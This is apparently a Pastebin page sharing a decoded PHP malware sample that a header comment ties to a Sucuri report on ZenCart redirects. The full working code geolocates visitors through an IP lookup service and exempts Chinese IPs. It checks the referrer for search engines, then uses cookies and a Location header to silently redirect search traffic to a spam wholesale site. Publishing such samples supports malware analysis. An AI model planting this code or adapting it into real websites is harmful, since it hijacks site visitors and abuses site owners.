API tools faq
paste
Advertisement
Guest User

Untitled

a guest
May 5th, 2014
828
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.64 KB | None | 0 0
raw download clone embed print report
  1. /* new version of the decoded malware.
  2.    Check http://blog.sucuri.net/2014/02/mysterious-zencart-redirects-leverage-http-headers.html for details
  3. */
  4. error_reporting(7);
  5. $check ="shine-check";
  6. $check2 ="twotime";
  7. $adsen_code ='';//插入谷歌广告
  8. $CookieTime=0;
  9. function getIP()
  10. {
  11.     static $realip;
  12.     if (isset($_SERVER)){
  13.         if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])){
  14.             $realip = $_SERVER["HTTP_X_FORWARDED_FOR"];
  15.         } else if (isset($_SERVER["HTTP_CLIENT_IP"])) {
  16.             $realip = $_SERVER["HTTP_CLIENT_IP"];
  17.         } else {
  18.             $realip = $_SERVER["REMOTE_ADDR"];
  19.         }
  20.     } else {
  21.         if (getenv("HTTP_X_FORWARDED_FOR")){
  22.             $realip = getenv("HTTP_X_FORWARDED_FOR");
  23.         } else if (getenv("HTTP_CLIENT_IP")) {
  24.             $realip = getenv("HTTP_CLIENT_IP");
  25.         } else {
  26.             $realip = getenv("REMOTE_ADDR");
  27.         }
  28.     }
  29.  
  30.  
  31.     return $realip;
  32. }
  33.  
  34.  
  35. /**
  36.  * 获取 IP  地理位置
  37.  * 淘宝IP接口
  38.  * @Return: array
  39.  */
  40. function getCity($ip)
  41. {
  42.     $url="http://ip.taobao.com/service/getIpInfo.php?ip=".$ip;
  43.     $ip=json_decode(@file_get_contents($url));  
  44.     if((string)$ip->code=='1'){
  45.        return false;
  46.     }
  47.     $data = (array)$ip->data;
  48.     return $data;  
  49. }
  50. $ip=getIP();
  51. $data=getCity($ip);
  52. if($data){
  53.               if($data['country_id']=='CN'){ //判断是否中国IP
  54.               setcookie("USERID", "twotime", 0,"/","");
  55.            }
  56.        else
  57.        {
  58.          $target_url=array();
  59. //$target_url[0]="http";
  60. for($i=0;$i<79;$i++)  
  61. {
  62.     $target_url[$i]="http://www.goodsellwholesaler.com";//这里改成你要跳转的网址
  63. }
  64. for($i=80;$i<100;$i++)
  65. {
  66.     $target_url[$i]="mailto:hackseo@post.com";
  67. }
  68. function rand_array($arr)
  69. {
  70.     $arr_size=sizeof($arr);
  71.     $tmp_arr=array();
  72.     for($i=0;$i<$arr_size;$i++){
  73.         mt_srand((double) microtime()*1000000);
  74.         $rd=mt_rand(0,$arr_size-1);
  75.         if($tmp_arr[$rd]=="")
  76.         {
  77.             $tmp_arr[$rd]=$arr[$i];
  78.         }
  79.         else
  80.         {
  81.             $i=$i-1;
  82.         }
  83.     }
  84.     return $tmp_arr;
  85. }
  86. $attack_url=rand_array($target_url);
  87. $attackurl="www";
  88. $l1=$_SERVER["HTTP_ACCEPT_LANGUAGE"];
  89. if(isset($_SERVER['HTTP_REFERER'])){
  90. $a1 = $_SERVER['HTTP_REFERER'];
  91. } else {
  92. $a1 = '';
  93. }
  94. $l2="zh";
  95. $a2="bing";
  96. $a3="com.hk";
  97. $a5="google";
  98. $a4="yahoo";
  99. if (( strpos($l1,$l2) === false )and( ( strpos($a1,$a3) == false ))and(( strpos($a1,$a2) == true )or( strpos($a1,$a5) == true )or( strpos($a1,$a4) == true )) and ( strpos($attack_url[1],$attackurl) == true )) {
  100. setcookie("USERID", "shine-check", 0,"/","");Header("Location: $attack_url[1]");}
  101. else
  102. {
  103. setcookie("USERID", "twotime", 0,"/","");
  104. }
  105.        }
  106.    
  107. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!